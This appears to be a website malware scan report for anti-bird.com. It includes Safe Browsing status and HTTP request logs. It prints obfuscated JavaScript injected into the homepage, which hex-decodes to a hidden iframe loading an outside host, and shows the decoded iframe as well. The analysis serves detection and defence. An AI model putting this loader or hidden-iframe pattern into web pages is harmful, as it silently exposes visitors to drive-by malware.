Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anti-bird.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://anti-bird.com/ | 200 OK Content-Length: 1328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4738b8febe334(v4738b8febeb54){ function v4738b8febf375 () {var v4738b8febfb96=16; return v4738b8febfb96;} return(parseInt(v4738b8febeb54,v4738b8febf375()));}function v4738b8fec03bd(v4738b8fec0bda){ var v4738b8fec13fa='';for(v4738b8fec1c1b=0; v4738b8fec1c1b<v4738b8fec0bda.length; v4738b8fec1c1b+=2){ v4738b8fec13fa+=(String.fromCharCode(v4738b8febe334(v4738b8fec0bda.substr(v4738b8fec1c1b, 2))));}return v4738b8fec13fa;} document.write(v4738b8fec03bd('3C696672616D65206E616D653D273730333139383727207372633D27687474703A2F2F696371646F7375672E636F6D2F706F6F642F696E6465782E706870272077696474683D353330206865696768743D323134207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='7031987' src='http://icqdosug.com/pood/index.php' width=530 height=214 style='display:none'></iframe> Antivirus reports:
| ||
http://anti-bird.com/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: anti-bird.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 06:56:11 GMT
Accept-Ranges: bytes
ETag: "2ac8048-530-4b7c0a94f6840"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1328
Content-Type: text/html
Last-Modified: Mon, 30 Jan 2012 15:40:09 GMT
...1328 bytes of data.
GET / HTTP/1.1
Host: anti-bird.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 06:56:11 GMT
Accept-Ranges: bytes
ETag: "2ac8048-530-4b7c0a94f6840"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1328
Content-Type: text/html
Last-Modified: Mon, 30 Jan 2012 15:40:09 GMT
...1328 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: anti-bird.com
Referer: http://www.google.com/search?q=anti-bird.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: anti-bird.com
Referer: http://www.google.com/search?q=anti-bird.com
Result:
The result is similar to the first query. There are no suspicious redirects found.